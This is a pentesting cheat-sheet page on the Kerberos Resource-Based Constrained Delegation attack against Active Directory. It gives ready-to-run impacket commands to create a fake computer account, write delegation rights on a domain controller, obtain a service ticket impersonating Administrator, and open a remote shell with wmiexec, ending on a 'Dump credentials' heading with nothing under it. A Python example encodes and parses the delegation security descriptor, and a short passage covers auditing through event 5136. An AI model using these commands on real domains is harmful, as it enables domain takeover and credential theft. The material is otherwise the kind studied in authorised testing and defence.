RBCD (Resource-Based Constrained Delegation) Attack
Last modified: 2024-09-10
Resource-Based Constrained Delegation (RBCD) lets a resource, here a domain computer object such as DC$, declare which accounts may delegate to it through its msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The attack targets that attribute on a domain computer: an attacker who can write it adds a computer account they control, then uses S4U2Self and S4U2Proxy to obtain service tickets to the target as any user (for example Administrator) for the service principals the target hosts, such as cifs/, ldap/ or host/.
Exploit
Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation
0. Prerequisites
To carry out this attack we need the following:
- A domain account with write access to the target computer object, specifically to its msDS-AllowedToActOnBehalfOfOtherIdentity attribute (GenericWrite on the object or WriteProperty on that attribute is enough).
- A domain account that can create a new computer account. By default any domain user can create up to ms-DS-MachineAccountQuota (10) computer accounts; if the quota is 0, an existing account with an SPN that we control can take the role of the fake computer, since S4U2Self requires an SPN.
- LDAP (389) and SAMR (445), or LDAPS (636), access to the DC.
- Kerberos (88) access to the DC.
1. Create Fake Computer
Create a computer account we control. addcomputer talks to SAMR (445) by default; pass -method LDAPS to create the account over LDAPS (636) instead.
impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'
2. Modify Delegation Rights
We can use rbcd.py (impacket-rbcd) to write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the target. The credentials here are those of the account with write access to the target from the prerequisites; -delegate-from is the computer we control and -delegate-to is the target.
impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'
The same tool supports -action 'read', which prints the accounts currently allowed to delegate to the target; running it before and after the write confirms that FAKECOMPUTER$ was added (and shows any delegation that was already configured, which the write keeps).
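What -action 'write' actually stores, and what a defender reads back when auditing, is a binary self-relative security descriptor whose DACL grants access to the SIDs allowed to delegate to the object. The following Python is an added example, not rbcd.py's own code (rbcd.py does the same thing with impacket's ldaptypes structures): it builds such a descriptor from a list of SIDs, parses one back into the list of allowed SIDs, and appends a SID to an existing descriptor the way the write action preserves delegations that are already present. The SID used for FAKECOMPUTER$ is a constructed placeholder; in a real run it would be read from the objectSid attribute of the account created in step 1.

```python
import struct

# MS-DTYP constants used by the descriptor rbcd.py writes.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 0x04
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF                # 983551, the access mask impacket's rbcd.py grants
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"  # owner/group rbcd.py puts on a new descriptor

# Constructed placeholder for the objectSid of FAKECOMPUTER$ (not a real domain).
FAKE_COMPUTER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1234"


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' into the binary SID layout:
    revision(1) | sub-authority count(1) | authority(6, big-endian) | sub-authorities(4 each, LE)."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID string: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int) -> tuple[str, int]:
    """Decode a binary SID at buf[off:]; return (string form, encoded length)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * count


def build_rbcd_descriptor(allowed_sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR with one ACCESS_ALLOWED ACE (full control) per SID,
    laid out as header | owner SID | group SID | DACL. This is the kind of value
    'impacket-rbcd -action write' stores on the target computer object."""
    allowed_sids = list(allowed_sids)
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    group = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        # ACE: type(1) | flags(1) | size(2) | access mask(4) | SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), FULL_CONTROL) + sid_bytes
    # ACL header: revision(1) | sbz1(1) | size(2) | ACE count(2) | sbz2(2)
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    off_owner = 20                       # the descriptor header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    # Header: revision(1) | sbz1(1) | control(2) | offsets to owner, group, SACL (0 = none), DACL
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + group + dacl


def allowed_to_act(descriptor: bytes) -> list[str]:
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL, i.e. the
    accounts permitted to delegate to the object. This is the audit view of the attribute:
    a SID here that does not belong to a legitimate front-end service is a finding."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", descriptor, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []                        # no DACL present: nobody may delegate
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, off_dacl)
    sids, off = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", descriptor, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(descriptor, off + 8)[0])
        off += ace_size                  # ace_size covers the ACE header and its SID
    return sids


def add_allowed_sid(descriptor: bytes, sid: str) -> bytes:
    """Append a SID to an existing descriptor's grants, keeping the ones already there,
    as the write action does when the attribute is already set on the target."""
    current = allowed_to_act(descriptor)
    if sid in current:
        return descriptor
    return build_rbcd_descriptor(current + [sid])


if __name__ == "__main__":
    sd = build_rbcd_descriptor([FAKE_COMPUTER_SID])
    print("descriptor bytes:", len(sd))
    print("allowed to act on behalf of the target:", allowed_to_act(sd))
```

For auditing, the same allowed_to_act() can be run over the raw attribute value of every computer object pulled over LDAP; any SID it returns that is not a known, intended front-end service account is worth investigating, and the change itself is visible in directory-service object modification auditing (event 5136) on the DC when that auditing is enabled.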
3. Get the Impersonated Service Ticket
getST authenticates as FAKECOMPUTER$, performs S4U2Self for the impersonated user and then S4U2Proxy to the requested SPN, and saves the resulting service ticket to a .ccache file. The SPN must be one the target hosts: cifs/ for SMB access (file shares, psexec-style execution), ldap/ for LDAP on a DC (for example a DCSync), host/ or http/ for other services. Users marked "Account is sensitive and cannot be delegated" or members of the Protected Users group cannot be impersonated this way.
impacket-getST -spn 'cifs/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
# or
impacket-getST -spn 'ldap/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
4. Use the Service Ticket
After getting the service ticket, we can use it for further pentesting.
Before doing that, point the KRB5CCNAME environment variable at the .ccache file getST printed ("Saving ticket in ..."); the example below assumes the ticket was saved as admin.ccache in the current directory:
export KRB5CCNAME=$(pwd)/admin.ccache
# Check by listing the cached tickets.
# If the klist command is not found, install it with `apt install krb5-user`.
klist
Login to Services with Kerberos Auth
The target given to the impacket tool must be the hostname from the ticket's SPN (dc.example.local, not the bare domain name), and that hostname must resolve from our machine; add it to /etc/hosts if there is no DNS.
# -k: use Kerberos auth
# -no-pass: do not prompt for a password
impacket-wmiexec example.local/Administrator@dc.example.local -k -no-pass
Dump credentials